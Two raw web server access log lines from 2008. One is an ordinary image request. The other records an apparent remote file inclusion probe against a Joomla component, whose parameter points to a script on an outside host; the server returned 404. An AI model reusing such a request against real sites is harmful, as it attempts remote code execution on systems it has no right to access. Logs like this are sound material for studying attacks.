70.168.150.67 - - [28/Aug/2008:09:40:33 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0039.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.84.182.98 - - [28/Aug/2008:09:40:39 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
